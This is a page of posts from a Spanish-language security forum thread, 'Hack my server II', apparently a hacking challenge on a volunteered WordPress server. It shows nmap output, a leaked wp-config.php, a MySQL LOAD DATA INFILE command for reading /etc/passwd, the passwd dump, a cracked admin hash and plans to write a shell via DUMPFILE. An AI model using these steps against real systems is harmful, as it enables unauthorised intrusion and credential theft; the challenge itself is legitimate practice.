elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


Tema destacado: Recopilación de Tutoriales y Manuales del blog ordenados por categorías


  Mostrar Mensajes
Páginas: 1 ... 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 [387] 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 ... 769
3861  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 21:47 pm
¿El wp_config.php lo puedes ver usando el infile? :O

Se..

Código
  1. <?php
  2. // ** MySQL settings ** //
  3. define('DB_NAME', 'hackme2');    // The name of th...
  4. define('DB_USER', 'root');     // Your MySQL usern...
  5. define('DB_PASSWORD', ''); // ...and password
  6. define('DB_HOST', 'localhost');    // 99% chance y...
  7.  
  8. // You can have multiple installations in one data...
  9. $table_prefix  = 'wp_';   // Only numbers, letters...
  10.  
  11. // Change this to localize WordPress.  A correspon...
  12. // chosen language must be installed to wp-include...
  13. // For example, install de.mo to wp-includes/langu...
  14. // to enable German language support.
  15. define ('WPLANG', '');
  16.  
  17. /* That's all, stop editing! Happy blogging. */
  18.  
  19. define('ABSPATH', dirname(__FILE__).'/');
  20. require_once(ABSPATH.'wp-settings.php');
  21. ?>

Saludos
3862  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 21:32 pm
El ID es 1, hay usuarios del 1 al 7. WHK, el tienes el PHPMyADMIN desprotegido para lanzar cualquier SQL xD, el wp-config.php

db_user = 'root';
db_password = '';
db_name = 'hackme2';
db_prefix = 'wp_';

Saludos
3863  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 20:24 pm
Perdon xD

Bueno, tenemos acceso a PHPMyAdmin como root, tenemos todos los privilegios, esto lo podemos ver usando la pestaña Users de PHPMyAdmin.

root    127.0.0.1    No    ALL PRIVILEGES    Yes

Sabiendo esto, sabemos que tenemos acceso a funciones como LOAD DATA o DUMPFILE.

Por tanto, podemos crear una tabla, y usar LOAD DATA para ver el contenido de ficheros a los que tenemos acceso.

Código
  1. LOAD DATA INFILE '/etc/passwd' INTO TABLE BaseDeDatos.tabla;


PD: @xustyx has mirado el directorio de webmin ? Yo es que no lo encuentro por ninguna parte xD


PD2: He vuelto a poner la contraseña original del usuario admin de WP (aclaro que no fui yo el que la cambio).  Para quitaros trabajo inútil:
 a7c85c1a6114797d06425195899a8abe = 2bc11f

PD3: El directorio de webmin es /usr/share/webmin

Saludos
3864  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 20:09 pm
Buenas


Algo de progreso...

/etc/passwd - sin contraseñas :(
Código
  1. root:x:0:0:root:/root:/bin/bash
  2. daemon:x:1:1:daemon:/usr/sbin:/bin/sh
  3. bin:x:2:2:bin:/bin:/bin/sh
  4. sys:x:3:3:sys:/dev:/bin/sh
  5. sync:x:4:65534:sync:/bin:/bin/sync
  6. games:x:5:60:games:/usr/games:/bin/sh
  7. man:x:6:12:man:/var/cache/man:/bin/sh
  8. lp:x:7:7:lp:/var/spool/lpd:/bin/sh
  9. mail:x:8:8:mail:/var/mail:/bin/sh
  10. news:x:9:9:news:/var/spool/news:/bin/sh
  11. uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
  12. proxy:x:13:13:proxy:/bin:/bin/sh
  13. www-data:x:33:33:www-data:/var/www:/bin/sh
  14. backup:x:34:34:backup:/var/backups:/bin/sh
  15. list:x:38:38:Mailing List Manager:/var/list:/bin/s...
  16. irc:x:39:39:ircd:/var/run/ircd:/bin/sh
  17. gnats:x:41:41:Gnats Bug-Reporting System (admin):/...
  18. nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
  19. libuuid:x:100:101::/var/lib/libuuid:/bin/sh
  20. fetchmail:x:101:65534::/var/lib/fetchmail:/bin/fal...
  21. sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
  22. syslog:x:103:106::/home/syslog:/bin/false
  23. klog:x:104:107::/home/klog:/bin/false
  24. bind:x:105:109::/var/cache/bind:/bin/false
  25. smmta:x:106:110:Mail Transfer Agent,,,:/var/lib/se...
  26. smmsp:x:107:111:Mail Submission Program,,,:/var/li...
  27. landscape:x:108:112::/var/lib/landscape:/bin/false
  28. mysql:x:109:113:MySQL Server,,,:/nonexistent:/bin/.

Saludos
3865  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 19:23 pm
Es que lo mas gracioso de todo es que la carpeta /uploads no existe xD
Código
  1. http://host.net/wp-content/uploads/

Saludos
3866  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 19:19 pm
el WP parece vulnerable por todos lados pero dado que no tiene permisos ni para editarse a si mismo, es un poco inutil intentar subir algo por ahi..

Via el PHPMyAdmin se puede subir mediante dumpfile al directorio /tmp .. si solo pudieramos encontrar un LFI, la shell estaria subida.

Saludos
3867  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 18:52 pm
Código
  1. &#8594; nmap -sV  ###########
  2.  
  3. Starting Nmap 6.00 ( http://nmap.org ) at 2014-08-01 16:07 CEST
  4. Nmap scan report for #########  (#########)
  5. Host is up (0.18s latency).
  6. rDNS record for ######: #######
  7. Not shown: 995 closed ports
  8. PORT      STATE    SERVICE      VERSION
  9. 22/tcp    open     ssh          (protocol 2.0)
  10. 53/tcp    open     domain
  11. 80/tcp    open     http         Apache httpd 2.4.6 ((Ubuntu))
  12. 445/tcp   filtered microsoft-ds
  13. 10000/tcp open     http         MiniServ 1.690 (Webmin httpd)

Saludos
3868  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 18:48 pm
Que Lammer urruina juego! No siguió las reglas.

pffffffffff...

Fui yo por hacer la gracia xD No he rooteado ni nada, fue inyeccion de HTML en uno de los post..

Saludos
3869  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 15:43 pm
El puerto 22 es ssh .. el rsa2 key es el handshake para cifrado.

Saludos
3870  Seguridad Informática / Hacking / Re: Hack my server II en: 1 Agosto 2014, 14:51 pm
Pues las tipica donde se suben archivos de wordpress

' /var/www/wp-content/uploads/ ' -> 404 Ese no existe (wordpress no tiene permisos para crearlo)
' /var/www/wp-content/themes/ ' -> Index list
' /var/www/wp-content/plugins/ ' -> Index list


PD: Si lo intentas por dumpfile en PHPMyAdmin.. olvidalo, mysqld no tiene permiso para la carpeta /var/www .. solo he conseguido subir en /tmp.. pero haria falta un LFI para llegar hasta ahi.

Saludos
Páginas: 1 ... 372 373 374 375 376 377 378 379 380 381 382 383 384 385 386 [387] 388 389 390 391 392 393 394 395 396 397 398 399 400 401 402 ... 769
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines